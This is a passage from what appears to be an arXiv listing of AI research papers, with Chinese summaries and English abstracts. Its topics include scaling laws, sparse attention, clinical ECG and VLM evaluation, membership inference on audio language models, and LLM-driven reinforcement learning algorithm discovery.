Abstract:The growing deployment of small Unmanned Aerial Systems (sUASs) in low-altitude airspaces has increased the need for reliable tactical deconfliction under safety-critical constraints. Tactical deconfliction involves short-horizon decision-making in dense, partially observable, and heterogeneous multi-agent environments, where both cooperative separation assurance and operational efficiency must be maintained. While Large Language Models (LLMs) exhibit strong reasoning capabilities, their direct application to air traffic control remains limited by insufficient domain grounding and unpredictable output inconsistency. This paper investigates LLMs as decision-makers in cooperative multi-agent tactical deconfliction using fine-tuning strategies that align model outputs to human operator heuristics. We propose a simulation-to-language data generation pipeline based on the BlueSky air traffic simulator that produces rule-consistent deconfliction datasets reflecting established safety practices. A pretrained Qwen-Math-7B model is fine-tuned using two parameter-efficient strategies: supervised fine-tuning with Low-Rank Adaptation (LoRA) and preference-based fine-tuning combining LoRA with Group-Relative Policy Optimization (GRPO). Experimental results on validation datasets and closed-loop simulations demonstrate that supervised LoRA fine-tuning substantially improves decision accuracy, consistency, and separation performance compared to the pretrained LLM, with significant reductions in near mid-air collisions. GRPO provides additional coordination benefits but exhibits reduced robustness when interacting with heterogeneous agent policies.
[AI-15] -Norm Operators for EU AI Act Compliance Classification: An Empirical Comparison of Lukasiewicz Product and Gödel Semantics in a Neuro-Symbolic Reasoning System
【速读】:该论文旨在解决欧盟人工智能法案(EU AI Act)合规分类中神经符号推理系统内逻辑合取操作符选择对分类性能的影响问题。解决方案的关键在于通过对比三种t-范数操作符(Lukasiewicz、Product与Gödel)在LGGT+(Logic-Guided Graph Transformers Plus)引擎中的表现,量化其在准确率、假阳性率和边界案例召回率上的差异,从而揭示不同语义机制对模型可靠性与敏感性的影响。研究发现,虽然操作符类型影响显著(p < 0.001),但规则库完备性是决定性能的首要因素;Gödel操作符因最小值语义实现最高召回率(85%),但引入0.8%假阳性;而Lukasiewicz与Product操作符保持零假阳性但易漏判边界案例,提示混合语义策略为后续优化方向。
链接: https://arxiv.org/abs/2603.28558
作者: Adam Laabs
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 11 pages, 8 tables, open-source code and dataset at this https URL
Abstract:We present a first comparative pilot study of three t-norm operators – Lukasiewicz (T_L), Product (T_P), and Gödel (T_G) - as logical conjunction mechanisms in a neuro-symbolic reasoning system for EU AI Act compliance classification. Using the LGGT+ (Logic-Guided Graph Transformers Plus) engine and a benchmark of 1035 annotated AI system descriptions spanning four risk categories (prohibited, high_risk, limited_risk, minimal_risk), we evaluate classification accuracy, false positive and false negative rates, and operator behaviour on ambiguous cases. At n=1035, all three operators differ significantly (McNemar p0.001). T_G achieves highest accuracy (84.5%) and best borderline recall (85%), but introduces 8 false positives (0.8%) via min-semantics over-classification. T_L and T_P maintain zero false positives, with T_P outperforming T_L (81.2% vs. 78.5%). Our principal findings are: (1) operator choice is secondary to rule base completeness; (2) T_L and T_P maintain zero false positives but miss borderline cases; (3) T_G’s min-semantics achieves higher recall at cost of 0.8% false positive rate; (4) a mixed-semantics classifier is the productive next step. We release the LGGT+ core engine (201/201 tests passing) and benchmark dataset (n=1035) under Apache 2.0.
[AI-16] Detecting low left ventricular ejection fraction from ECG using an interpretable and scalable predictor-driven framework
【速读】:该论文旨在解决低左心室射血分数(Low Left Ventricular Ejection Fraction, LVEF)在临床中常被漏诊的问题,尤其是在无症状阶段难以及时识别,从而限制了早期干预的可能性。为应对这一挑战,作者提出了一种结构化的检测框架——基于心电图的预测驱动型LVEF检测(ECG-based Predictor-Driven LEF, ECGPD-LEF),其关键在于将基础模型生成的诊断概率与可解释建模相结合,实现了高精度且具备机制透明性的LVEF风险评估。该方法不仅显著优于现有端到端黑箱模型和依赖商业算法的表格系统,在多个临床亚组中均保持稳健性能,还通过可解释性分析揭示了若干高影响力预测因子(如正常心电图、不完全左束支传导阻滞及前侧壁心内膜下损伤),这些特征本身即可实现零样本推理(zero-shot-like inference),表明心室功能障碍信息已隐含于结构化的诊断概率表示中,从而兼顾预测准确性与机制可解释性,支持未来通过引入新特征进行扩展并无缝集成至现有AI心电图系统。
链接: https://arxiv.org/abs/2603.28532
作者: Ya Zhou,Tianxiang Hao,Ziyi Cai,Haojie Zhu,Hejun He,Jia Liu,Xiaohan Fan,Jing Yuan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Applications (stat.AP)
备注:
Abstract:Low left ventricular ejection fraction (LEF) frequently remains undetected until progression to symptomatic heart failure, underscoring the need for scalable screening strategies. Although artificial intelligence-enabled electrocardiography (AI-ECG) has shown promise, existing approaches rely solely on end-to-end black-box models with limited interpretability or on tabular systems dependent on commercial ECG measurement algorithms with suboptimal performance. We introduced ECG-based Predictor-Driven LEF (ECGPD-LEF), a structured framework that integrates foundation model-derived diagnostic probabilities with interpretable modeling for detecting LEF from ECG. Trained on the benchmark EchoNext dataset comprising 72,475 ECG-echocardiogram pairs and evaluated in predefined independent internal (n=5,442) and external (n=16,017) cohorts, our framework achieved robust discrimination for moderate LEF (internal AUROC 88.4%, F1 64.5%; external AUROC 86.8%, F1 53.6%), consistently outperforming the official end-to-end baseline provided with the benchmark across demographic and clinical subgroups. Interpretability analyses identified high-impact predictors, including normal ECG, incomplete left bundle branch block, and subendocardial injury in anterolateral leads, driving LEF risk estimation. Notably, these predictors independently enabled zero-shot-like inference without task-specific retraining (internal AUROC 75.3-81.0%; external AUROC 71.6-78.6%), indicating that ventricular dysfunction is intrinsically encoded within structured diagnostic probability representations. This framework reconciles predictive performance with mechanistic transparency, supporting scalable enhancement through additional predictors and seamless integration with existing AI-ECG systems.
[AI-17] he Unreason able Effectiveness of Scaling Laws in AI
【速读】:该论文试图解决经典AI缩放定律(scaling laws)在实践中表现出的两个看似矛盾的现象:其一,这些定律虽为经验性观察,却能在不同模型家族和训练相关场景中反复适用;其二,尽管预测边际收益递减,实际进展仍因效率提升而持续,例如每token成本下降。解决方案的关键在于认识到,缩放定律的有效性源于对实现细节的抽象——将计算量(compute)视为逻辑计算(logical compute),即与具体实现无关的模型侧工作量,而实际扩展压力则取决于资源转化为该逻辑计算的效率。这种抽象解释了定律跨场景的普适性,并揭示出效率提升成为维持Scaling可持续性的核心驱动力,从而将问题从单纯的损失曲线下降转向系统级效率改进的“效率博弈”。
链接: https://arxiv.org/abs/2603.28507
作者: Chien-Ping Lu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 8 pages, 1 figure
Abstract:Classical AI scaling laws, especially for pre-training, describe how training loss decreases with compute in a power-law form. Their effectiveness has a basic and very practical sense: they make progress predictable, albeit at a declining rate. Yet their effectiveness is also unreasonable in two further senses. First, these laws are largely empirical and observational, but they appear repeatedly across model families and increasingly across training-adjacent regimes. Second, despite the diminishing returns they predict, progress in practice has often continued through rapidly improving efficiency, visible for example in falling cost per token. This paper argues that both features arise from the same source: scaling laws are unusually effective because they abstract away from many realization details. The compute variable is best understood as logical compute, an implementation-agnostic notion of model-side work, while the practical burden of scaling depends on how efficiently real resources are converted into that compute. This abstraction helps explain both why the laws travel so well across settings and why they give rise to a persistent efficiency game in hardware, algorithms, and systems. Once efficiency is made explicit, the main practical question becomes how many efficiency doublings are required to keep scaling productive despite diminishing returns. Under that view, diminishing returns are not only a geometric flattening of the loss curve, but also rising pressure for cost reduction, system-level innovation, and the breakthroughs needed to sustain Moore-like efficiency doublings.
[AI-18] Next-Token Prediction and Regret Minimization
【速读】:该论文旨在解决在对抗性在线决策环境中,如何利用基于下一个token预测(next-token prediction)的模型来实现低后悔(low-regret)决策的问题。核心问题是:当训练一个预测模型以学习对手动作序列分布 D 时,何时该模型诱导的近似最优响应策略能够保证低对抗后悔?其关键解决方案在于区分上下文窗口的长度:对于无界上下文窗口(即模型可依赖全部历史动作),证明任意分布 D 均存在一个与其总变差距离指数级接近的低后悔分布,从而可在几乎不损失原始模型准确性的前提下实现次线性后悔;而对于有界上下文窗口(如现代Transformer架构中仅依赖最近 w 步动作的情况),则存在某些分布 D 与所有低后悔分布之间距离为常数阶(Θ(1)),说明此类结构本身无法保证低后悔,需额外处理。进一步地,作者提出可通过标准Transformer层实现无界上下文的鲁棒化重构,并提供实证证据表明Transformer可高效学习这些新构造的低后悔分布。
链接: https://arxiv.org/abs/2603.28499
作者: Mehryar Mohri,Clayton Sanford,Jon Schneider,Kiran Vodrahalli,Yifan Wu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注:
Abstract:We consider the question of how to employ next-token prediction algorithms in adversarial online decision-making environments. Specifically, if we train a next-token prediction model on a distribution \mathcalD over sequences of opponent actions, when is it the case that the induced online decision-making algorithm (by approximately best responding to the model’s predictions) has low adversarial regret (i.e., when is \mathcalD a \emphlow-regret distribution)? For unbounded context windows (where the prediction made by the model can depend on all the actions taken by the adversary thus far), we show that although not every distribution \mathcalD is a low-regret distribution, every distribution \mathcalD is exponentially close (in TV distance) to one low-regret distribution, and hence sublinear regret can always be achieved at negligible cost to the accuracy of the original next-token prediction model. In contrast to this, for bounded context windows (where the prediction made by the model can depend only on the past w actions taken by the adversary, as may be the case in modern transformer architectures), we show that there are some distributions \mathcalD of opponent play that are \Theta(1) -far from any low-regret distribution \mathcalD’ (even when w = \Omega(T) and such distributions exist). Finally, we complement these results by showing that the unbounded context robustification procedure can be implemented by layers of a standard transformer architecture, and provide empirical evidence that transformer models can be efficiently trained to represent these new low-regret distributions. Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT) Cite as: arXiv:2603.28499 [cs.LG] (or arXiv:2603.28499v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28499 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-19] HISA: Efficient Hierarchical Indexing for Fine-Grained Sparse Attention
【速读】:该论文旨在解决稀疏注意力机制中因索引器(indexer)对整个上下文序列进行逐token扫描而导致的计算瓶颈问题,特别是在长序列场景下,传统方法如DeepSeek Sparse Attention (DSA) 的 indexer 会产生 O(L²) 的每层复杂度,严重限制了扩展性。解决方案的关键在于提出一种名为 HISA(Hierarchical Indexed Sparse Attention)的层级化索引结构:它将原本单一层次的 token 级别搜索转化为两阶段过程——首先通过块级粗筛(block-level coarse filter)对池化后的块代表进行评分以剔除无关区域,再在候选块内使用原始 indexer 进行细粒度精筛。该设计无需额外训练即可保持与原DSA一致的 token-level top-k 稀疏模式,且在 kernel-level 基准测试中实现了高达 4× 的加速比(128K 上下文长度),同时在 Needle-in-a-Haystack 和 LongBench 等任务上验证了其精度无损(mean IoU > 99%)。
链接: https://arxiv.org/abs/2603.28458
作者: Yufei Xu,Fanxu Meng,Fan Jiang,Yuxuan Wang,Ruijie Zhou,Jiexi Wu,Zhixin Pan,Zhaohui Wang,Xiaojuan Tang,Wenjie Pei,Tongxuan Liu,Di yin,Xing Sun,Muhan Zhang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Token-level sparse attention mechanisms, exemplified by DeepSeek Sparse Attention (DSA), achieve fine-grained key selection by scoring every historical token for each query using a lightweight indexer, and then computing attention only over the selected subset. While the downstream sparse attention scales efficiently, the indexer still scans the entire prefix for every query, introducing an O( L^2 ) per-layer bottleneck that becomes prohibitive as context length grows. We propose HISA (Hierarchical Indexed Sparse Attention), a drop-in replacement for the indexer that transforms the search process from a flat token scan into a two-stage hierarchical procedure. First, a block-level coarse filter scores pooled block representatives to prune irrelevant regions. Then, a token-level refinement applies the original indexer only within the remaining candidate blocks. HISA preserves the exact token-level top-k sparsity pattern required by the downstream Sparse MLA operator and requires no additional training. On kernel-level benchmarks, HISA achieves a 2 \times speedup at 32K context length and 4 \times at 128K. On Needle-in-a-Haystack and LongBench, we directly replace the indexer in DeepSeek-V3.2 with HISA, without any fine-tuning. HISA closely matches the original DSA in quality while significantly outperforming block-sparse baselines. Moreover, the token selection sets produced by HISA and the original DSA exhibit a mean IoU greater than 99%, indicating that the efficiency gains come with virtually no impact on selection fidelity.
[AI-20] AceleradorSNN: A Neuromorphic Cognitive System Integrating Spiking Neural Networks and DynamicImage Signal Processing on FPGA
【速读】:该论文旨在解决自动驾驶系统(如高级驾驶辅助系统ADAS、无人机UAV及工业4.0机器人)中对高速、低延迟和高能效目标检测的需求,这一需求已暴露出传统卷积神经网络(CNN)的局限性。其解决方案的关键在于提出AceleradorSNN架构,该架构融合了基于脉冲神经网络(Spiking Neural Networks, SNNs)的类脑处理单元(Neuromorphic Processing Unit, NPU),用于处理动态视觉传感器(Dynamic Vision Sensors, DVS)产生的异步事件数据,并结合一个可动态重构的认知图像信号处理器(Cognitive Image Signal Processor, ISP)来处理RGB摄像头数据,从而实现高效、实时的目标检测与感知。
链接: https://arxiv.org/abs/2603.28429
作者: Daniel Gutierrez,Ruben Martinez,Leyre Arnedo,Antonio Cuesta,Soukaina El Hamry
机构: 未知
类目: Hardware Architecture (cs.AR); Artificial Intelligence (cs.AI)
备注:
Abstract:The demand for high-speed, low-latency, and energy-efficient object detection in autonomous systems – such as advanced driver-assistance systems (ADAS), unmanned aerial vehicles (UAVs), and Industry 4.0 robotics – has exposed the limitations of traditional Convolutional Neural Networks (CNNs). To address these challenges, we have developed AceleradorSNN, a third-generation artificial intelligence cognitive system. This architecture integrates a Neuromorphic Processing Unit (NPU) based on Spiking Neural Networks (SNNs) to process asynchronous data from Dynamic Vision Sensors (DVS), alongside a dynamically reconfigurable Cognitive Image Signal Processor (ISP) for RGB cameras. This paper details the hardware-oriented design of both IP cores, the evaluation of surrogate-gradienttrained SNN backbones, and the real-time streaming ISP architecture implemented on Field-Programmable Gate Arrays (FPGA).
[AI-21] Spectral Higher-Order Neural Networks
【速读】:该论文旨在解决传统神经网络在处理高阶交互(higher-order interactions)时存在的稳定性差与参数规模难以控制的问题,尤其是在非超图结构输入场景下,现有方法(如增强型图神经网络)优势受限。其解决方案的关键在于提出谱域重构策略——通过将模型重新表述为基于谱属性(spectral attributes)的形式,从而有效缓解加权高阶前向传播带来的不稳定性与参数扩展难题,实现了通用前馈网络结构中高阶耦合机制的稳定集成。
链接: https://arxiv.org/abs/2603.28420
作者: Gianluca Peri,Timoteo Carletti,Duccio Fanelli,Diego Febbe
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Neural networks are fundamental tools of modern machine learning. The standard paradigm assumes binary interactions (across feedforward linear passes) between inter-tangled units, organized in sequential layers. Generalized architectures have been also designed that move beyond pairwise interactions, so as to account for higher-order couplings among computing neurons. Higher-order networks are however usually deployed as augmented graph neural networks (GNNs), and, as such, prove solely advantageous in contexts where the input exhibits an explicit hypergraph structure. Here, we present Spectral Higher-Order Neural Networks (SHONNs), a new algorithmic strategy to incorporate higher-order interactions in general-purpose, feedforward, network structures. SHONNs leverages a reformulation of the model in terms of spectral attributes. This allows to mitigate the common stability and parameter scaling problems that come along weighted, higher-order, forward propagations.
[AI-22] KGroups: A Versatile Univariate Max-Relevance Min-Redundancy Feature Selection Algorithm for High-dimensional Biological Data
【速读】:该论文旨在解决特征选择(Feature Selection, FS)中一个关键问题:当前大多数单变量滤波式特征选择(Univariate Filter Feature Selection, FFS)方法的预测性能提升,究竟在多大程度上依赖于所采用的选择算法本身,而非仅由相关性(relevance)或冗余性(redundancy)评估机制决定。传统FFS方法主要分为两类:基于相关性最大化(Max-Rel,又称KBest)和同时最大化相关性并最小化冗余性(mRMR)。尽管mRMR表现优异但计算复杂度高,而KBest虽快却受限于单一排序策略。本文提出一种新的单变量FFS算法KGroups,其核心创新在于利用聚类(clustering)替代传统的排序或增量搜索策略进行特征选择,从而在保持与多变量mRMR相当预测性能的同时,显著提升效率(最高达821倍),且具备可调参特性,为后续超参数优化留出空间。
链接: https://arxiv.org/abs/2603.28417
作者: Malick Ebiele,Malika Bendechache,Rob Brennan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:This paper proposes a new univariate filter feature selection (FFS) algorithm called KGroups. The majority of work in the literature focuses on investigating the relevance or redundancy estimations of feature selection (FS) methods. This has shown promising results and a real improvement of FFS methods’ predictive performance. However, limited efforts have been made to investigate alternative FFS algorithms. This raises the following question: how much of the FFS methods’ predictive performance depends on the selection algorithm rather than the relevance or the redundancy estimations? The majority of FFS methods fall into two categories: relevance maximisation (Max-Rel, also known as KBest) or simultaneous relevance maximisation and redundancy minimisation (mRMR). KBest is a univariate FFS algorithm that employs sorting (descending) for selection. mRMR is a multivariate FFS algorithm that employs an incremental search algorithm for selection. In this paper, we propose a new univariate mRMR called KGroups that employs clustering for selection. Extensive experiments on 14 high-dimensional biological benchmark datasets showed that KGroups achieves similar predictive performance compared to multivariate mRMR while being up to 821 times faster. KGroups is parameterisable, which leaves room for further predictive performance improvement through hyperparameter finetuning, unlike mRMR and KBest. KGroups outperforms KBest.
[AI-23] Evolutionary Discovery of Reinforcement Learning Algorithms via Large Language Models GECCO2026
【速读】:该论文旨在解决传统强化学习(Reinforcement Learning, RL)算法设计中依赖人工手写更新规则、难以发现新颖有效机制的问题。其核心解决方案是提出一种基于进化的框架,通过直接在可执行的更新规则空间中搜索完整的训练过程,实现RL算法的自动化发现。关键创新在于利用大语言模型作为生成变异算子(generative variation operators),扩展了REvolve系统从奖励函数发现到算法发现的能力,并通过排除经典结构(如actor-critic架构、时序差分损失和价值自举)来促进非标准学习规则的涌现;此外,引入后进化微调阶段,由大语言模型为每个演化出的更新规则推荐可行的超参数范围,从而提升算法在多个Gymnasium基准上的端到端性能,达到与SAC、PPO、DQN和A2C等主流算法相当的水平。
链接: https://arxiv.org/abs/2603.28416
作者: Alkis Sygkounas,Amy Loutfi,Andreas Persson
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: accepted at GECCO 2026
Abstract:Reinforcement learning algorithms are defined by their learning update rules, which are typically hand-designed and fixed. We present an evolutionary framework for discovering reinforcement learning algorithms by searching directly over executable update rules that implement complete training procedures. The approach builds on REvolve, an evolutionary system that uses large language models as generative variation operators, and extends it from reward-function discovery to algorithm discovery. To promote the emergence of nonstandard learning rules, the search excludes canonical mechanisms such as actor–critic structures, temporal-difference losses, and value bootstrapping. Because reinforcement learning algorithms are highly sensitive to internal scalar parameters, we introduce a post-evolution refinement stage in which a large language model proposes feasible hyperparameter ranges for each evolved update rule. Evaluated end-to-end by full training runs on multiple Gymnasium benchmarks, the discovered algorithms achieve competitive performance relative to established baselines, including SAC, PPO, DQN, and A2C.
[AI-24] From Simulation to Deep Learning: Survey on Network Performance Modeling Approaches
【速读】:该论文旨在解决网络性能建模方法多样化且缺乏系统性分类与评估标准的问题,特别是在有线网络领域中,传统基于离散事件仿真(Discrete Event Simulation, DES)和数学理论(如排队论和网络演算)的方法正逐步被并行化DES、机器学习模型及混合方法所补充甚至替代。其解决方案的关键在于提出一个全面的综述框架,梳理近几十年来主流的网络性能建模技术,并构建一套清晰的分类体系(taxonomy),以总结当前研究进展及其随技术演进和学术关注点变化的趋势;同时,论文还深入探讨了不同模型类型的评估需求与目标差异,为后续方法比较与选择提供依据。
链接: https://arxiv.org/abs/2603.28394
作者: Carlos Güemes-Palau,Miquel Ferriol-Galmés,Jordi Paillisse-Vilanova,Pere Barlet-Ros,Albert Cabellos-Aparicio
机构: 未知
类目: Networking and Internet Architecture (cs.NI); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Preprint, final accepted version published on Computer Networks (DOI: https://doi.org/10.1016/j.comnet.2026.112253 ). 87 pages, 3 figures
Abstract:Network performance modeling is a field that predates early computer networks and the beginning of the Internet. It aims to predict the traffic performance of packet flows in a given network. Its applications range from network planning and troubleshooting to feeding information to network controllers for configuration optimization. Traditional network performance modeling has relied heavily on Discrete Event Simulation (DES) and analytical methods grounded in mathematical theories such as Queuing Theory and Network Calculus. However, as of late, we have observed a paradigm shift, with attempts to obtain efficient Parallel DES, the surge of Machine Learning models, and their integration with other methodologies in hybrid approaches. This has resulted in a great variety of modeling approaches, each with its strengths and often tailored to specific scenarios or requirements. In this paper, we comprehensively survey the relevant network performance modeling approaches for wired networks over the last decades. With this understanding, we also define a taxonomy of approaches, summarizing our understanding of the state-of-the-art and how both technology and the concerns of the research community evolve over time. Finally, we also consider how these models are evaluated, how their different nature results in different evaluation requirements and goals, and how this may complicate their comparison.
[AI-25] he Scaffold Effect: How Prompt Framing Drives Apparent Multimodal Gains in Clinical VLM Evaluation
【速读】:该论文旨在解决临床人工智能(AI)系统中性能提升是否真正源于对多模态数据的深度理解,而非仅依赖于表面特征或提示工程的问题。其核心挑战在于如何区分模型的实际多模态推理能力与因任务提示设计导致的虚假关联,尤其是在神经影像学这类缺乏个体诊断信号的数据集上。解决方案的关键在于通过严格的对比分析和专家评估揭示“支架效应”(scaffold effect)——即仅在任务提示中提及MRI可用性即可导致高达70–80%的性能提升,而无需实际使用影像数据;同时发现偏好对齐虽能消除MRI引用行为,却使模型表现退化至随机水平,表明当前表面指标无法反映真实推理能力,从而强调了在临床部署中需建立更可靠的多模态推理验证机制。
链接: https://arxiv.org/abs/2603.28387
作者: Doan Nam Long Vu,Simone Balloccu
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Trustworthy clinical AI requires that performance gains reflect genuine evidence integration rather than surface-level artifacts. We evaluate 12 open-weight vision-language models (VLMs) on binary classification across two clinical neuroimaging cohorts, \textscFOR2107 (affective disorders) and \textscOASIS-3 (cognitive decline). Both datasets come with structural MRI data that carries no reliable individual-level diagnostic signal. Under these conditions, smaller VLMs exhibit gains of up to 58% F1 upon introduction of neuroimaging context, with distilled models becoming competitive with counterparts an order of magnitude larger. A contrastive confidence analysis reveals that merely \emphmentioning MRI availability in the task prompt accounts for 70-80% of this shift, independent of whether imaging data is present, a domain-specific instance of modality collapse we term the \emphscaffold effect. Expert evaluation reveals fabrication of neuroimaging-grounded justifications across all conditions, and preference alignment, while eliminating MRI-referencing behavior, collapses both conditions toward random baseline. Our findings demonstrate that surface evaluations are inadequate indicators of multimodal reasoning, with direct implications for the deployment of VLMs in clinical settings.
[AI-26] COvolve: Adversarial Co-Evolution of Large-Language-Model-Generated Policies and Environments via Two-Player Zero-Sum Game GECCO2026
【速读】:该论文旨在解决持续智能体(continually improving agents)在静态或手动构建的训练环境中难以实现持续学习与分布外泛化的问题。解决方案的关键在于提出一种名为COvolve的协同进化框架,该框架利用大语言模型(LLM)同时生成可执行Python代码形式的环境和策略,并将环境与策略设计者之间的交互建模为两人零和博弈,从而通过对抗性协同进化自动诱导出由简至繁的自动化课程。为保障鲁棒性和防止遗忘,进一步计算该零和博弈的混合策略纳什均衡(MSNE),由此得到的元策略(meta-policy)确保智能体在学习新环境的同时不遗忘旧环境的解法,实现了无需预定义任务分布或人工干预的开放-ended学习。
链接: https://arxiv.org/abs/2603.28386
作者: Alkis Sygkounas,Rishi Hazra,Andreas Persson,Pedro Zuidberg Dos Martires,Amy Loutfi
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted at GECCO 2026
Abstract:A central challenge in building continually improving agents is that training environments are typically static or manually constructed. This restricts continual learning and generalization beyond the training distribution. We address this with COvolve, a co-evolutionary framework that leverages large language models (LLMs) to generate both environments and agent policies, expressed as executable Python code. We model the interaction between environment and policy designers as a two-player zero-sum game, ensuring adversarial co-evolution in which environments expose policy weaknesses and policies adapt in response. This process induces an automated curriculum in which environments and policies co-evolve toward increasing complexity. To guarantee robustness and prevent forgetting as the curriculum progresses, we compute the mixed-strategy Nash equilibrium (MSNE) of the zero-sum game, thereby yielding a meta-policy. This MSNE meta-policy ensures that the agent does not forget to solve previously seen environments while learning to solve previously unseen ones. Experiments in urban driving, symbolic maze-solving, and geometric navigation showcase that COvolve produces progressively more complex environments. Our results demonstrate the potential of LLM-driven co-evolution to achieve open-ended learning without predefined task distributions or manual intervention.
[AI-27] Critic-Free Deep Reinforcement Learning for Maritime Coverag e Path Planning on Irregular Hexagonal Grids
【速读】:该论文旨在解决海上监视任务中复杂不规则海域的高效覆盖路径规划问题,传统方法在处理海岸线、岛屿和排除区等几何复杂性时存在分解困难或计算成本过高的缺陷。其解决方案的关键在于提出一种基于深度强化学习(Deep Reinforcement Learning, DRL)的框架,将覆盖路径规划建模为神经组合优化任务,采用Transformer结构的指针策略网络(pointer policy)自回归生成覆盖路径,并引入无价值函数估计的组相对策略优化(Group-Relative Policy Optimization, GRPO)机制,通过实例内轨迹比较来估计优势值,从而提升长程路径规划中的策略稳定性。实验表明,该方法在未见过的合成海事环境中实现了99.0%的哈密顿成功率,显著优于现有启发式方法(46.0%),且路径长度更短、转向次数更少,同时推理时间控制在50~ms/实例,具备实时 onboard 部署可行性。
链接: https://arxiv.org/abs/2603.28385
作者: Carlos S. Sepúlveda,Gonzalo A. Ruz
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Neural and Evolutionary Computing (cs.NE); Robotics (cs.RO)
备注:
Abstract:Maritime surveillance missions, such as search and rescue and environmental monitoring, rely on the efficient allocation of sensing assets over vast and geometrically complex areas. Traditional Coverage Path Planning (CPP) approaches depend on decomposition techniques that struggle with irregular coastlines, islands, and exclusion zones, or require computationally expensive re-planning for every instance. We propose a Deep Reinforcement Learning (DRL) framework to solve CPP on hexagonal grid representations of irregular maritime areas. Unlike conventional methods, we formulate the problem as a neural combinatorial optimization task where a Transformer-based pointer policy autoregressively constructs coverage tours. To overcome the instability of value estimation in long-horizon routing problems, we implement a critic-free Group-Relative Policy Optimization (GRPO) scheme. This method estimates advantages through within-instance comparisons of sampled trajectories rather than relying on a value function. Experiments on 1,000 unseen synthetic maritime environments demonstrate that a trained policy achieves a 99.0% Hamiltonian success rate, more than double the best heuristic (46.0%), while producing paths 7% shorter and with 24% fewer heading changes than the closest baseline. All three inference modes (greedy, stochastic sampling, and sampling with 2-opt refinement) operate under 50~ms per instance on a laptop GPU, confirming feasibility for real-time on-board deployment.
[AI-28] Membership Inference Attacks against Large Audio Language Models INTERSPEECH2026
【速读】:该论文旨在解决大型音频语言模型(Large Audio Language Models, LALMs)在成员推理攻击(Membership Inference Attack, MIA)评估中因音频数据固有非语义信息导致的虚假性能表现问题。传统MIA评估易受训练集与测试集间分布偏移(distribution shift)干扰,从而产生误导性结论。其解决方案的关键在于提出一种多模态盲基线(multi-modal blind baseline),该基线基于文本、频谱和韵律特征,在不依赖模型推理的情况下即可识别出常见语音数据集中近乎完美的训练-测试可分性(AUC≈1.0),并揭示标准MIA得分与这些声学伪影(acoustic artifacts)存在高度相关性(相关系数>0.7)。通过此基线,研究进一步筛选出分布匹配的数据集以消除分布偏移混杂因素,并在此基础上开展多种MIA方法的基准测试及模态解耦实验,最终发现LALM的记忆效应具有跨模态特性,仅源于说话人声纹与其文本内容的绑定关系,而非单一模态内部的信息存储。这一发现为超越虚假相关性的LALM审计提供了原则性标准。
链接: https://arxiv.org/abs/2603.28378
作者: Jia-Kai Dong,Yu-Xiang Lin,Hung-Yi Lee
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI)
备注: submitted to Interspeech 2026
Abstract:We present the first systematic Membership Inference Attack (MIA) evaluation of Large Audio Language Models (LALMs). As audio encodes non-semantic information, it induces severe train and test distribution shifts and can lead to spurious MIA performance. Using a multi-modal blind baseline based on textual, spectral, and prosodic features, we demonstrate that common speech datasets exhibit near-perfect train/test separability (AUC approximately 1.0) even without model inference, and the standard MIA scores strongly correlate with these blind acoustic artifacts (correlation greater than 0.7). Using this blind baseline, we identify that distribution-matched datasets enable reliable MIA evaluation without distribution shift confounds. We benchmark multiple MIA methods and conduct modality disentanglement experiments on these datasets. The results reveal that LALM memorization is cross-modal, arising only from binding a speaker’s vocal identity with its text. These findings establish a principled standard for auditing LALMs beyond spurious correlations.
[AI-29] Coherent Without Grounding Grounded Without Success: Observability and Epistemic Failure
【速读】:该论文试图解决的问题是:当前大型语言模型(Large Language Models, LLMs)在行为表现与解释能力之间存在脱节,传统上将解释一致性视为理解的标志这一假设在LLMs中不再成立。作者指出,在低可观测性领域,LLMs可能成功执行任务却错误识别其机制;而在高可观测性领域,它们虽能生成符合因果结构的解释却无法转化为有效干预。解决方案的关键在于提出“认知三角模型”(Epistemic Triangle),强调必须同时考察解释的连贯性(coherence)、知识的具身化(grounding)以及解释与行为之间的正当基础关系(basing relation),从而建立一个三元评估框架,以更准确地判断人工智能代理是否具备真正的认知理解。
链接: https://arxiv.org/abs/2603.28371
作者: Camilo Chacón Sartori
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注:
Abstract:When an agent can articulate why something works, we typically take this as evidence of genuine understanding. This presupposes that effective action and correct explanation covary, and that coherent explanation reliably signals both. I argue that this assumption fails for contemporary Large Language Models (LLMs). I introduce what I call the Bidirectional Coherence Paradox: competence and grounding not only dissociate but invert across epistemic conditions. In low-observability domains, LLMs often act successfully while misidentifying the mechanisms that produce their success. In high-observability domains, they frequently generate explanations that accurately track observable causal structure yet fail to translate those diagnoses into effective intervention. In both cases, explanatory coherence remains intact, obscuring the underlying dissociation. Drawing on experiments in compiler optimization and hyperparameter tuning, I develop the Epistemic Triangle, a model of how priors, signals, and domain knowledge interact under varying observability. The results suggest that neither behavioral success nor explanatory accuracy alone suffices for attributing understanding. I argue that evaluating artificial epistemic agents requires a tripartite framework – coherence, grounding, and a proper basing relation linking explanation to action. The systematic separation of knowing-that and knowing-how in LLMs thus challenges assumptions inherited from both epistemology and current AI evaluation practice.
[AI-30] CoE: Collaborative Entropy for Uncertainty Quantification in Agent ic Multi-LLM Systems ICLR
